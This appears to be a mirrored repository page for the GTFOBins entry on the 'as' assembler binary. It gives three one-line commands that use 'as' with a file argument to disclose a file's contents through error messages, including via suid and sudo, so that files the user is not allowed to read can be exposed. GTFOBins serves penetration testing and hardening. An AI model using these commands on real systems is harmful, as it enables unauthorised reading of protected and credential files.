1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/as.md
LinuxSploit f03907836c
Add as
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-09-11 09:58:05 +02:00

394 B

description functions
The file content is treated as command line options and disclosed throught error messages, so this is not suitable to read arbitrary binary data.
file-read suid sudo
code
LFILE=file_to_read as @$LFILE
code
LFILE=file_to_read ./as @$LFILE
code
LFILE=file_to_read sudo as @$LFILE